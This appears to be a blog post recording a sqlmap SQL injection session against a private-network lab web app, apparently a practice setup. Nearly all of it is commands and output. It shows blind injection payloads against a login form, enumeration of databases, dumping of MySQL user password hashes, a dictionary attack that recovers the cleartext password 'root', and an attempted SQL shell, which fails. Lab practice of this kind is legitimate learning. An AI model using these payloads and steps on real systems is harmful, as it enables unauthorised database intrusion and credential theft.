I scan with sqlmap and this is the syntax
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" --dbs --level=5 --risk=3
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 22:36:50
[22:36:51] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:36:51] [INFO] testing connection to the target url
[22:36:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27
Place: POST
Parameter: password
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---
[22:36:51] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:36:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:36:58] [INFO] fetching database names
[22:36:58] [INFO] fetching number of databases
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 9
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': information_schema
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': Joomla
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': dvwa
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': mysql
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': phpmyadmin
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': test
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku3
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': wordpress
available databases [9]:
[*] dvwa
[*] information_schema
[*] Joomla
[*] mysql
[*] phpmyadmin
[*] test
[*] webku
[*] webku3
[*] wordpress
[22:36:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'
[*] shutting down at: 22:36:58
and the I try to search for a username and password from the database with sqlmap
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --password --level=5 --risk=3
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 22:37:51
[22:37:52] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:37:52] [INFO] testing connection to the target url
[22:37:52] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27
Place: POST
Parameter: password
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---
[22:37:52] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:37:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:37:54] [INFO] fetching database users password hashes
[22:37:54] [INFO] fetching database users
[22:37:54] [INFO] fetching number of database users
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 5
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'pakdhe-laptop'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'127.0.0.1'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'debian-sys-maint'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'phpmyadmin'@'localhost'
[22:37:54] [INFO] fetching number of password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 2
[22:37:54] [INFO] fetching password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[22:37:54] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *896747F40953077D8AB58F8A3002427D8DC256FE
[22:37:54] [INFO] fetching number of password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[22:37:57] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[22:37:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[22:38:02] [INFO] starting dictionary attack (mysql_passwd)
[22:38:04] [INFO] found: 'root' for user: 'root'
[22:38:05] [INFO] found: 'root' for user: 'phpmyadmin'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *896747F40953077D8AB58F8A3002427D8DC256FE
[*] phpmyadmin [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
[*] root [2]:
password hash: *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
[22:39:55] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'
[*] shutting down at: 22:39:55
Then I try to connect from sqlmap tp to the shell of mysql
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --sql-shell --level=5 --risk=3
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 08:27:56
[08:27:56] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:27:56] [INFO] testing connection to the target url
[08:27:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27
Place: POST
Parameter: password
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---
[08:27:56] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[08:27:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[08:27:59] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show databases;
do you want to retrieve the SQL statement output? [Y/n/a] y
[08:28:18] [INFO] fetching SQL SELECT statement query output: 'show databases;'
[08:28:18] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[08:28:18] [INFO] retrieved:
sql-shell>
But seems it can't connect
to be continued................
|
Post a Comment